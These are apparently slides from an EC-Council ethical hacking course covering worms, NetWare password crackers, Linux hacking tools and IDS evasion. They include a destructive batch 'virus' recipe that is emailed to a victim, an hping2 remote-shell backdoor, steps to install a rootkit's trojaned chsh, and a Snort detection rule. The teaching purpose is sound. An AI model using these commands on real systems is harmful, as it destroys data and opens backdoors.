  • 433. EC-Council BugBear Virus ~ This worm propagates via shared network folders and via email. ~ It also terminates antivirus programs, act as a backdoor server application, and sends out system passwords - all of which compromise security on infected machines. BugBear Infection • This worm fakes the FROM field and obtains the recipients for its email from email messages, address books and mail boxes on the infected system. It generates the filename for the attached copy of itself from the following: • A combination of text strings: setup, card, docs, news, Image, images, pics, resume, photo, video, music or song data; with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the following extensions: SCR, PIF or EXE. • On systems with un patched Internet Explorer 5.0 and 5.5, the worm attachment is executed automatically when messages are either opened or previewed using Microsoft Outlook or Outlook Express.
  • 434. EC-Council Klez ElKern, KLAZ, Kletz, I-Worm.klez, W95/Klez@mm ~W32.Klez variants is a mass mailing worm that searches the Windows address book for email addresses and sends messages to all the recipients that it finds. The worm uses its own SMTP engine to send the messages. ~The subject and attachment name of the incoming emails are randomly chosen. The attachment will have one of the extensions: .bat, .exe, .pif or .scr. ~The worm exploits a vulnerability in Microsoft Outlook and Outlook Express to try execute itself when you open or preview the message.
  • 435. EC-Council SirCam Worm ~SirCam is a mass mailing e-mail worm with the ability of spreading through Windows Network shares. ~SirCam sends e-mails with variable user names and subject fields, and attaches user documents with double extensions (such as .doc.pif or .xls.lnk) to them. ~Thw orm collects a list of files with certain extensions ('.DOC', '.XLS', '.ZIP') into fake DLL files named 'sc*.dll'. Thw orm then sends itself out with one of the document files it found in a users' "My Documents" folder.
  • 436. EC-Council Nimda Virus ~Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE. ~It affects Windows 95, 98, ME, NT4 and Windows 2000 users. ~Nimda is the first worm to modify existing web sites to strt offering infected files for download. It is also the first worm to use normal end user machines to scan for vulnerable web sites. ~Nimda uses the Unicode exploit to infect IIS Web servers.
  • 437. EC-Council Code Red Worm ~ The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found. ~ Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Windows 2000 Indexing Service. ~ If the exploit is successful, the worm begins executing on the victim host. In the earlier variant of the worm, victim hosts with a default language of English experienced the following defacement on all pages requested from the server: HELLO! welcome to http://www.worm.com! Hacked By Chinese!
  • 438. EC-Council Writing your own simple virus ~ Step 1: Create a batch file Game.bat with the following text @ echo off ~ delete c:winntsystem32*.* ~ delete c:winnt*.* ~ Step 2: Convert the Game.bat batch file to Game.com using bat2com utility. ~ Step 3: Assign Icon to Game.com using Windows file properties screen. ~ Step 4: Send the Game.com file as an e-mail attachment to a victim. ~ Step 5: When the victim runs this program, it deletes core files in WINNT directory making Windows unusable.
  • 439. EC-Council Hacking Tool: Senna Spy Internet Worm Generator 2000 (http://sennaspy.cjb.net) This tool can generate a VBS worm. An Executable can be inserted
  • 440. EC-Council Anti-Virus Software ~ The only prevention against virus is to install anti-virus software and keep the updates current. ~ Prominent anti-virus software vendors include: 1. Mc Afee 2. Norton AntiVirus 3. AntiViral Toolkit Pro 4. Dr. Solomon's 5. Trend Micro 6. Command AntiVirus 7. Data Fellows Virus Encyclopedia resources at Symantec
  • 441. EC-Council Summary ~ Viruses come in different forms. ~ Some are mere nuisances some come with devastating consequences. ~ E-mail worms are self replicating and clogs the networks with unwanted traffic. ~ Virus codes are not necessarily complex. ~ It is necessary to scan the systems/ networks for infections on a periodic basis for protection against viruses. ~ Anti-dotes to new virus releases are promptly made available by security companies and this forms the major counter measure.
  • 443. EC-Council Module Objective ~ Common Accounts and passwords ~ Accessing password files ~ Password crackers ~ Netware hacking tools – Chknull – NOVELBFH – NWPCRACK – Bindery – BlnCrack – SETPWD.NLM – Kock – userdump – Burglar – Getit – Spooflog – Gobbler – Novelffs – Pandora
  • 444. EC-Council Novell Netware Basics ~ Object Model ~ Access Control Lists ~ Rights ~ Levels of Access ~ Packet Signature
  • 445. EC-Council Default Accounts and Settings ~Server Settings ~Supervisor Account ~Default Rights ~RCONSOLE security concerns ~Server Commands and Settings
  • 446. EC-Council Valid Account names on Novell Netware ~ Any limited account should have enough access to allow you to run SYSCON, located in SYS:PUBLIC directory. ~ If you get in, type SYSCON and enter. Now go to User Information and you will see all defined accounts. ~ You will not get much info with a limited account, but you can get the account and the user's full name. ~ If you are IN with any valid account, you can run USETLST.EXE and get a list of all valid account names on the server.
  • 447. EC-Council Hacking Tool: Chknull.exe CHKNULL shows you every account with no password and you do not have to be logged in. For this to work bindery emulation must be on.
  • 448. EC-Council Access the password file in Novell Netware ~ Access to the password file in the Netware is not like Unix - the password file is not in the open. All objects and their properties are kept in the bindery files on the 3.x, and kept in the NDS database in the 4.x. ~ The bindery file attributes (or Flags) in 3.x are hidden and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. ~ 3.x - NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS ~ The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located in 3.x and 4.x respectively.
  • 449. EC-Council Access the password file in Novell Netware (contd..) ~In Netware 4.x. the files are physically located in different location than on SYS:volume. ~By using the RCONSOLE utility and using the Scan Directory option, you can see the files in SYS:_NETWARE: ~There is another way to view these files and potentially edit them. After installing NW4 on a NW3 volume, reboot the server with 3.x SERVER.EXE ~On a volume SYS will be on the _NETWARE directory. SYS:_NETWARE is hidden better on 4.1 that 4.0x. But in 4.1 you can still see the files by scanning the directory entry numbers using NCP calls (you need the APIs for this) using the function 0x17 sub function 0xF3.
  • 450. EC-Council Tool: NOVELBFH.EXE & NWPCRACK.EXE ~ Novelbfh is brute force password cracker which works on Netware 3.x versions. ~ NWPCRACK is a password cracker that works against a single account and uses a dictionary wordlist.
  • 451. EC-Council Hacking Tool: Bindery.exe & BinCrack.exe ~ Bindery.exe is a password cracker that works directly against the .OLD bindery files. ~ This tool extracts user information out of bindery files into a Unix-style password text file. ~ Then you can use BINCRACK.EXE to "crack" the extracted text file.
  • 452. EC-Council Hacking Tool: SETPWD.NLM If you have access to the console, either by standing in front of it or by RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords. Just load the NLM and pass it command line parameters: How to Use SETPWD.NLM
  • 453. EC-Council Other Tools ~ Hacking Tool: Kock For Netware 3.11, exploits bug in a Netware attached to log in without a password. ~ Hacking Tool: userdump UserDump simply lists all users in the Bindery. Works for Netware 3.x and 4.x (in Bindery Mode) ~ Hacking Tool: NWL Replacement LOGIN.EXE for Novell Netware. Run PROP.EXE from a Supervisor account to create a new property. Replace existing LOGIN.EXE in SYS:LOGIN. Each time a user logs in, the text is stored in the new property. Use PROP.EXE to retrieve captured logins.
  • 454. EC-Council Hacking Tool: Getit ~ Getit is a hacking tool designed to capture passwords on a Novell network. ~ This tool is triggered by an instance of the LOGIN.EXE application used in Novell to authenticate and begin a login session on a workstation. ~ It works directly at the operating system level, intercepting calls to Interrupt 21h. It's probably the most well known NetWare hacking tool ever created.
  • 455. EC-Council Hacking Tool: Burglar, SetPass ~ It can only be used where an individual has physical access to the NetWare File server. ~ The utility is usually stored on a floppy disk. The attacker sometimes has to reboot the server. ~ SetPass is a loadable module, designed to give the user, supervisor status. ~ This module also requires physical access to the machine.
  • 456. EC-Council Hacking Tool: Spooflog, Novelffs http://www.gregmiller.net/novell.html ~ Spooflog is a program, written in C, by Greg Miller, that can spoof a workstation into believing that it is communicating with the server. ~ This is a fairly advanced exploit. ~ Novelffs creates a fake file server. It was written by Donar G E Alofs ~ Needs rebooting after work is done.
  • 457. EC-Council Hacking Tool: Gobbler Gobbler is a hacking tool which 'sniffs' network traffic on Novell servers.
  • 458. EC-Council Hacking Tool: Pandora ~ Pandora is a set of tools for hacking, intruding and testing the security and insecurity of Novell Netware 4.x and 5.x. Pandora consists of two distinct sets of programs - an "online" version and an "offline" version. ~ Features • Searches for target servers and grabs user accounts without logging in. • Multiple DOS attacks and dictionary attacks against user account • Attaches to server with password hashes extracted from Offline program. • Improved spoofing and hijacking by using real-time sniffing. Silently 'read' files as they are downloaded from server to client.
  • 459. EC-Council Pandora Countermeasure ~ The best protection against this type of attack is establishing and enforcing a strong password policy. ~ Physical access to all servers should be prevented. Remote management tools like RCONSOLE over SPX or RCONj or TCP/IP should not be used. ~ In Netware 5.x environment, screen saver also gives good protection, because the screen saver requires an NDS username and password of a user with supervisor rights to the server to log in.
  • 460. EC-Council Summary ~ All parts of the overall NetWare system are objects. Each object in the security model has an Access Control List, or ACL. Objects are clustered together in an overall hierarchy. There are a total of five different levels of access that can be logically defined from the security model – not logged in, logged in, supervisory access, administrative access, and console access. ~ NetWare server(<=4.X) by design itself does not offer much in the way of protection as there is no means of auditing events done at the console. This is a physical security concern. ~ There is a security concern as the supervisor account password is the same as the first password for the Admin user until it is changed using a bindery administration utility. ~ Similar concerns in Novell are exploited by vigilant attackers. ~ Novell Password cracking tools can provide the attackers with room for further actions.
  • 462. EC-Council Module Objective ~ Why Linux? ~ Compiling Programs in Linux ~ Scanning Networks ~ Mapping Networks ~ Password Cracking in Linux ~ SARA ~ TARA ~ Sniffing ~ A Pinger in disguise ~ Session Hijacking ~ Linux Rootkits ~ IP Chains and IP Tables ~ Linux Security Countermeasures
  • 463. EC-Council Why Linux? ~ Majority of servers around the globe are running on Linux / Unix-like platforms ~ Easy to get and Easy on pocket ~ There are many types of Linux-Distributions /Distros / Flavors such as Red Hat, Mandrake, Yellow Dog, Debian etc. ~ Source code is available ~ Easy to modify. ~ Easy to develop a program on Linux.
  • 464. EC-Council Compiling Programs in Linux ~ There are generally 3 steps to compiling programs under Linux. 1. Configuring how the program will be complied 2. Compiling the program 3. Installing the program $ ./configure $ make $ su Password $ make install $ exit
  • 465. EC-Council Scanning Networks ~ Once the IP address of a target system is known, an attacker can begin the process of port scanning, looking for holes in the system through which the attacker can gain access. ~ A typical system has 2^16 -1 port numbers and one TCP port and one UDP port for each number. ~ Each one of these ports are a potential way into the system. ~ The most popular Scanning tool for Linux is Nmap.
  • 466. EC-Council Hacking Tool: Nmap http://www.insecure.org/nmap ~ Stealth Scan, TCP SYN nmap -v -sS 192.168.0.0/24 ~ UDP Scan nmap -v -sU 192.168.0.0/24 ~ Stealth Scan, No Ping nmap -v -sS -P0 192.168.0.0/24 ~ Fingerprint nmap -v -O 192.168.0.0/24 #TCP
  • 467. EC-Council Scanning Networks ~One essential type of tool for any attacker or defender is the vulnerability scanner. ~These tool allow the attacker to connect to a target system and check for such vulnerabilities as configuration errors, default configuration settings that allow attackers access, and the most recently reported system vulnerabilities. ~The preferred open-source tool for this is Nessus. ~Nessus is an extremely powerful network scanner. It can also be configured to run a variety of attacks.
  • 469. EC-Council Port scan detection tools ~ Scanlogd - detects and logs TCP port scans. http://www.openwall.com/scanlogd/ Scanlogd only logs port scans. It does not prevent them. You will only receive summarized information in the system's log. ~ Abacus Portsentry http://www.psionic.com/abacus/portsentry/ Portscan detection daemon Portsentry has the ability to detect port scans (including stealth scans) on the network interfaces of your server. Upon alarm it can block the attacker via hosts.deny, dropped route or firewall rule.
  • 470. EC-Council Password Cracking in Linux ~ Xcrack (http://packetstorm.linuxsecurity.com/Crackers/) ~ Xcrack doesn't do much with rules. ~ It will find any passwords that match words in the dictionary file the user provides, but it won't apply any combinations or modifications of those words. ~ It is a comparatively fast tool.
  • 471. EC-Council Hacking Tool: John the Ripper http://www.openwall.com/john/ ~ John the Ripper require the user to have a copy of the password file. ~ This is a relatively fast password cracker, and the most popular amongst the hacker community. Cracking times, using the default dictionaries that come with the Linux system are as follows:
  • 472. EC-Council SARA (Security Auditor's Research Assistant) http://www-arc.com/sara ~ The Security Auditor's Research Assistant (SARA) is a third generation Unix-based security analysis tool that supports the FBI Top 20 Consensus on Security. ~ SARA operates on most Unix-type platforms including Linux & Mac OS X ~ SARA is the upgrade of SATAN tool. ~ Getting SARA up and running is a straight forward compilation process, and the rest is done via a browser.
  • 473. EC-Council Sniffit ~ http://reptile.rug.ac.be/^coder/sniffit/sniffit.html ~ Sniffit is one of the most famous and fastest Ethernet sniffers for Linux. ~ You can run it either on the command line with optional plug-ins and filters or in interactive mode, which is the preferred mode. ~ The interactive mode of Sniffit allows you to monitor connections in real-time and therefore sniff real-time too! Note: Remember to download the patch and then recompile Sniffit, for optimum results!
  • 474. EC-Council Hacking Tool: HPing2 http://www.hping.org ~ Hping is a command-line oriented TCP/IP packet assembly/analyzer. ~ More commonly known for its use as a pinging utility, HPing carries a hidden but handy usage, that is a Backdoor Trojan. ~ Just enter the following command on your victim $ ./hping2 -I eth) -9ecc | /bin/sh Then Telnet into any port of your victim and invoke commands remotely on your victim's host by preceding any Unix/Linux commands with ecc $ telnet victim.com 80 $ eccecho This Text imitates a trojan shovel
  • 475. EC-Council Session Hijacking ~ Using a combination of sniffing and spoofing techniques, session hijacking tools allow an attacker to steal a valid, established login session. ~ Examples of such sessions are Telnet and FTP sessions. With a successful session hijacking attempt, the victim's login session vanishes and he usually attributes it to network problems and logs in again. ~ There are generally two types of Session Hijacking Techniques: 1. Host-Based Session Hijacking 2. Network-Based Session Hijacking
  • 476. EC-Council Hacking Tool: Hunt http://lin.fsid.cvut.cz/^kra/index.html ~ One of Hunt's advantages over other session hijacking tools is that it uses techniques to avoid ACK storms. ~ Hunt avoids this ACK storm and the dropping of the connection by using ARP spoofing to establish the attacker's machine as a relay between Source and Destination. ~ Now the Attacker uses Hunt to sniff the packets the Source and Destination sends over this connection. The Attacker can choose to acts as a relay and forward these packets to their intended destinations, or he can hijack the session. ~ The attacker can type in commands that are forwarded to Destination but which the Source can't see. Any commands the Source types in can be seen on the Attacker's screen, but they are not sent to Destination. Then Hunt allows the attacker to restore the connection back to the Source when he/she is done with it.
  • 477. EC-Council Linux Rootkits ~ One way an intruder can maintain access to a compromised system is by installing a rootkit. ~ A rootkit contains a set of tools and replacement executables for many of the operating system's critical components, used to hide evidence of the attacker's presence and to give the attacker backdoor access to the system. ~ Rootkits require root access to install, but once set up, the attacker can get root access back at any time.
  • 478. EC-Council Linux Rootkit v4 (LR4) ~ Linux Rootkit is IV the latest version of a well known trojan package for Linux system. The rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, oasswd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2 ~ In the example below we will try the change shell command (chsh). Compile only chsh in chsh-directory and use 'fix' to replace the original with the trojan version. $ make gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - DSBINDER= "" -DUSRSBINDER= "" -DLOGDIR= "" -DVARPATH= "" chsh.c -o chsh.o gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - DSBINDER= "" -DUSRSBINDER= "" -DLOGDIR= "" -DVARPATH= "" setpwnam.c -o setpwnam.o gcc -s -N chsh.o setpwnam.o -o chsh $../fix /usr/bin/chsh ./chsh ../backup/chsh ~ Once done, the chsh command will spawn a root shell to any user who logs on to the Linux System
  • 479. EC-Council Rootkit Countermeasures chkrootkit is a tool to locally check for signs of a rootkit. It contains chkrootkit, a shell script that checks system binaries for rootkit modification. http://www.chkrootkit.org/
  • 480. EC-Council chkrootkit detects the following rootkits
  • 481. EC-Council Linux Firewall: IPChains ~ IPChains is a very general TCP/IP packet filter, it allows you to ACCEPT, DENY, MASQ, REDIRECT, or RETURN packets. ~ There are three chains that are always defined: input, output and forward. ~ The chain is executed whenever a packet is destined for a network interface: • the output chain is executed whenever a packet is exiting a network interface, destined elsewhere • the forward chain is executed whenever a packet must traverse between multiple interfaces ~ Chains are just rule sets that are executed in order, whenever a packet matches a rule then that specific target is executed.
  • 482. EC-Council IPTables ~ IPTables is the replacement of userspace tool ipchains in the Linux 2.4 kernel and beyond. IPTables has many more features than IPChains. ~ Connection tracking capability, i.e. the ability to do stateful packet inspection. ~ Simplified behavior of packets negotiating the built-in chains (INPUT, OUTPUT and FORWARD) ~ A clean separation of packet filtering and network address translation (NAT). ~ Rate-limited connection and logging capability ~ The ability to filter on tcp flag and tcp options, and also MAC addresses.
  • 483. EC-Council Linux Tools: Application Security ~ Whisker (http://www.wiretrip.net) Rain.Forest.Puppy's excellent CGI vulnerability scanner. ~ Flawfinder (http://www.dwheeler.com/flawfinder/) Flawfinder is a Python program which searches through souircve code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. this risk level depends not only on the function, but on the values of the parameters of the function. ~ StackGuard (hhtp://www.immunix.org) StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attack. Protection requires no source code changes at all. ~ Libsafe (http://www.avayalabs.com/project/libsafe/index.html) It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs.
  • 484. EC-Council Linux Tools: Intrusion Detection Systems ~ Tripwire (http://www.tripwire.com) A file and directory integrity checker. ~ LIDS (http://www.turbolinux.com.cn/lids/) The LIDS (Linux Intrusion Detection System) is an intrusion detection /defense system in the Linux kernel. The goal is to protect Linux systems disabling some system calls in the kernel itself. ~ AIDE (http://www.cs.tut.fi/^rammer/aide.html) AIDE (Advanced Intrusion detection Environment) is an Open Source IDS package. ~ Snort (http://www.snort.org) Flexible packet sniffer/logger that detects attacks. snort is a libpcap-based packet sniffer/logger which can be used as a lightweight Network Intrusion Detection System. ~ Samhain (http://samhain.sourceforge.net) Samhain is designed for intuitive configuration and tamper-resistance, and can be configured as a client/server application to monitor many hosts on a network from a single central location.
  • 485. EC-Council Linux Tools: Security Testing Tools ~ NMap (http://www.insecure.org/nmap) Premier network auditing and testing tool. ~ LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof) LSOF lists open files for running Unix/Linux processes. ~ Netcat (http://www.atstake.com/research/tools/index.html) Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. ~ Hping2 (http://www.kyuzz.org/antirez/hping/) hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ~ Nemesis (http://www.packetninja.net/nemesis/) The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux
  • 486. EC-Council Linux Tools: Encryption ~ Stunnel (http://www.stunnel.org) Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to daemon's code. ~ OpenSSH /SSH (http://www.openssh.com/) SSH (Secure Shell is a program for logging into a remote machine and for executinmg commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network. ~ GnuPG (http://www.gnupg.org) GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.
  • 487. EC-Council Linux Tools: Log and Traffic Monitors ~ MRTG (http://www.mrtg.org) The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. ~ Swatch (http://www.stanford.edu/^atkins/swatch/) Swatch, the simple watch daemon is a program for Unix system logging. ~ Timbersee http://www.fastcoder.net /^thumper/software/ sysadmin/ timbersee/) Timbersee is a program very similar to the Swatch program. ~ Logsurf (http://www.cert.dfn.de/eng/logsurf/) The program log surfer was designed to monitor any text-based logfiles on the system in realtime. ~ TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html) Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger etc. requests.
  • 488. EC-Council Linux Tools: Log and Traffic Monitors ~ IPLog (http://ojnk.sourceforge.net/) iplog is a TCP?IP traffic logger. Currently, it is capable of logging TCP, UDP and ICMP traffic. ~ IPTraf (http://cebu.mozcom.com/riker/iptraf/) IPTraf is an ncurses based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors and others. ~ Ntop (http://www.ntop.org) ntop is a Unix/Linux tool that shows the network usage, similar to what the popular "top" Unix/Linux command does.
  • 490. EC-Council Summary ~ Linux is gaining popularity and is fast becoming a stable industry strength OS. ~ Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access. Nmap being a popular tool. ~ Password cracking tools are available for Linux as well. ~ Sniffers as well as Packet assembly/analyzing tools for Linux provide attackers with the edge that they have dealing with other OSs. ~ Attackers with root privileges can engage in session hijacking as well. ~ Trojans, backdoors, worms are also prevalent in the Linux environment. ~ As with any other system, a well developed integrated procedure is to be put in place to counter the threats that exist.
  • 491. Ethical Hacking Module XIX Evading IDS, Firewalls and Honey pots
  • 492. EC-Council Module Objective ~ Intrusion Detection System ~ System Integrity Verifiers ~ How are Intrusions Detected? ~ Anomaly Detection ~ Signature Recognition ~ How does an IDS match Signatures with incoming Traffic? ~ Protocol Stack Verification ~ Application Protocol Verification ~ Hacking Through Firewalls ~ IDS Software Vendors ~ Honey Pots
  • 493. EC-Council Intrusion Detection Systems (IDS) ~ Intrusion Detection Systems (IDS) monitors packets on the network wire and attempts to discover if a hacker/hacker is attempting to break into a system (or cause a denial of service attack). ~ A typical example is a system that watches for large number of TCP connection requests (SYN) to many different ports on a target machine, thus discovering if someone is attempting a TCP port scan.
  • 494. EC-Council System Integrity Verifiers (SIV) ~ System Integrity Verifiers (SIV) monitor system files to find when an intruder changes. ~ Tripwire is one of the popular SIVs. ~ SIVs may watch other components such as Windows registry as well as chron configuration to find known signatures.
  • 495. EC-Council Intrusion Detection Signature Recognition ~ This means that for every hacker technique, the engineers code something into the system for that technique. ~ This can be as simple as a pattern match. The classic example is to examine every packet on the wire for the pattern "/cgi-bin/phf?" which indicates an attempt to access this vulnerable CGI script on a web-server. Anomaly Detection ~ The idea behind this approach is to measure a "baseline" of such stats as CPU utilization, disk activity, user logins, file activity, and so forth. ~ The benefit of this approach is that it can detect the anomalies without having to understand the underlying cause behind the anomalies.
  • 496. EC-Council How does an IDS match signatures with incoming traffic? ~ Traffic consists of IP datagrams flowing across a network. ~ An IDS is able to capture those packets as they flow by on the wire. ~ An IDS consists of a special TCP/IP stack that reassembles IP datagrams and TCP streams. It then applies some of the following techniques: • Protocol stack verification • Application protocol verification • Creating new loggable events
  • 497. EC-Council Protocol Stack Verification ~ A number of intrusions, such as "Ping -O-Death" and "TCP Stealth Scanning" use violations of the underlying IP, TCP, UDP and ICMP protocols in order to attack the machine. ~ A simple verification system can flag invalid packets. This can include valid, by suspicious, behavior such as severally fragmented IP packets.
  • 498. EC-Council Application Protocol Verification ~ A number of intrusions use invalid protocol behavior, such as “WinNuke”, which uses NetBIOS protocol (adding OOB data or DNS cache poisoning, which has a valid but unusual signature. ~ In order to effectively detect these intrusions, an IDS must re- implement a wide variety of application-layer protocols in order to detect suspicious or invalid behavior.
  • 499. EC-Council What happens after an IDS detects an attack? 1. Configure firewall to filter out the IP address of the intruder. 2. Alert user / administrator (sound / e-mail / Page). 3. Write an entry in the event log. Send an SNMP Trap datagram to a management console like HP Openview or Tivoli. 4. Save the attack information (timestamp, intruder IP address, Victim IP address/port, protocol information). 5. Save a tracefile of the raw packets for later analysis. 6. Launch a separate program to handle the event 7. Terminate the TCP session - Forge a TCP FIN packet to force a connection to terminate.
  • 500. EC-Council IDS Software Vendors ~ Black ICE by Network ICE (http://www.networkice.com) ~ CyberCop Monitor by Network Associates, Inc. (http://www.nai.com) ~ RealSecure by Internet Security Systems (ISS) (http://www.iss.net) ~ NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com) ~ eTrust Intrusion Detection by Computer Associates (http://www.cai.com) ~ NetProwler by Axent (http://www.axent.com) ~ Centrax by Cybersafe (http://www.cybersafe.com) ~ NFR by Network Flight Recorder (http://www.nfr.net) ~ Dragon by Security Wizards (http://www.network-defense.com)
  • 501. EC-Council Snort (http://www.snort.org) ~ Snort is an Open Source Intrusion Detection System ~ It contains over thousand signatures. and can be downloaded at http://www.snort.org/cgi-bin/done.cgi ~ Check out the following example: In this example of PHF attack detection, a straight text string is searched for in the app layer Alert tcp any any -> 192.168.1.0/24 80 (msg: “PHF attempt” ; content: “/cgi-bin/phf”;) It gives an alert, that a TCP connection from any IP address and any port to the 192.168.1.x subnet to port 80. It searches for the content "/cgi-bin/phf" anywhere in the content. If it find such content, it will alert the console with a message "PHF attempt"
  • 502. EC-Council Evading IDS Systems ~ Many simple network intrusion detection systems rely upon "pattern matching". ~ Attack scripts have well known patterns, so simply compiling a database of the output of known attack scripts provide pretty good detection, but can easily be evaded by simply changing the script. ~ IDS evasion focuses on foiling signature matching by altering an attacker' s appearance. For example, some POP3 servers are vulnerable to a buffer overflow when a long password is entered. It is easy to evade simply by changing the attack script.
  • 503. EC-Council Complex IDS Evasion ~ An intruder might send a TCP SYN packet that the IDS sees, but the victim host never sees. ~ This causes the IDS to believe the connection is closed, but when in fact it is not. Since TCP connections do not send "keep-alives", the intruder could wait hours or days after this "close" before continuing the attack. ~ The first attack is to find a way to pass packets as far as the IDS, and cause a later router to drop packets. ~ This depends upon the router configuration, but typical examples include low TTL fields, fragmentation, source routing, and other IP options. ~ If there is a slow link past the IDS, then the hacker can flood the link with high priority IP packets, and send the TCP FIN as a low priority packet - the router's queuing mechanism will likely drop the packet.
  • 504. EC-Council Hacking Tool: fragrouter ~ Fragrouter is a program for routing network traffic in such a way as to elude most network intrusion detection systems. ~ Fragrouter allows attacks to avoid detection by network intrusion detection systems. ~ For exmple, the Fragrouter could be used to obfuscate a phf attack against a web server, a buffer overflow attack against a DNS server, or any number of other attacks. fragrouter [ -i interface ] [ -p ] [ ATTACK ] host
  • 505. EC-Council Hacking Tool: Tcpreplay http://sourceforge.net/projects/tcpreplay/ ~ Tcpreplay is a set of UNIX tools which allows the replaying of captured network traffic. ~ It can be used to test a variety of network devices including routers, firewalls, and NIDS. tcpreplay [ -i intf ] [ -l loop count ] [ -r rate | -m multiplier ] file ...
  • 506. EC-Council Hacking Tool: SideStep.exe http://www.robertgraham.com/tmp/sidestep.html ~ Sidestep is a hacking tool which evades network IDS in a completely different manner compared to fragrouter.
  • 507. EC-Council Hacking Tool: Anzen NIDSbench http://www.anzen.com/research/nidsbench/ ~ Contains "fragrouter" that forces all traffic to fragment, which demonstrates how easy it is for hackers/crackers to do the same in order to evade intrusion detection. ~ This accepts incoming traffic then fragments it according to various rules (IP fragmentation with various sizes and overlaps, TCP segmentation again with various sizes and overlaps, TCP insertion in order to de-synchronize the connection, etc.)
  • 508. EC-Council Hacking Tool: ADMutate http://www.ktwo.ca/security.html ~ ADMutate accepts a buffer overflow exploit as input and randomly creates a functionally equivalent version which bypasses IDS. ~ Once a new attack is known, it usually takes the IDS vendors a number of hours or days to develop a signature. But in the case of ADMutate, it has taken months for signature- based IDS vendors to add a way to detect a polymorphic buffer overflow generated by it.
  • 509. EC-Council Tools to inject strangely formatted packets on to the wire ~ Libnet (http://www.packetfactory.net/libnet) ~ Rootshell (http://www.rootshell.com) ~ IPsend (http://www.coombs.anu.edu.au/^avalon) ~ Sun Packet Shell (psh) Protocol Testing Tool (http://www.playground.sun.com/psh) ~ Net::RawIP (http://www.quake.skif.net/RawIP) ~ CyberCop Scanner’s CASL (http://www.nai.com)
  • 510. EC-Council What do I do when I have been hacked? ~ Incident response team Set up an "incident response team". Identify those people who should be called whenever people suspect an intrusion in progress. ~ Response procedure You need to decide now what your priorities are between network uptime and intrusion. Can you pull the network plug whenever you strongly suspect intrusion? Do you want to allow continued intrusion in order to gather evidence against the intruder? ~ Lines of communication Do you propagate the information up the corporate food chain from your boss up to the CEO, Do you inform the FBI or police? Do you notify partners (vendors/customers)
  • 511. EC-Council Hacking through firewalls ~ One of the easiest and most common ways for an attacker to slip by a firewall is by installing some network software on an internal system that communicates using a port address permitted by the firewall's configuration. ~ A popular port to use is port 53 TCP, normally used by DNS. ~ Many firewalls permit all traffic using port 53 by default, because it simplifies firewall configuration and reduces support calls.
  • 512. EC-Council Bypassing Firewall using Httptunnel ~http://www.nocrew.org/software/httptunnel.html ~Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests. The requests can be sent via an HTTP proxy if desired so.
  • 513. EC-Council Placing Backdoors through Firewalls The reverse www shell ~ This backdoor should work through any firewall and allow users to surf the WWW. A program is run on the internal host, which spawns a child every day at a special time. ~ For the firewall, this child acts like a user, using his Netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server operated by the hacker on the internet via a legitimate looking http request and sends it ready signal. ~ The legitimate looking answer of the www server operated by the hacker are in reality the commands the child will execute on it's machine in the local shell.
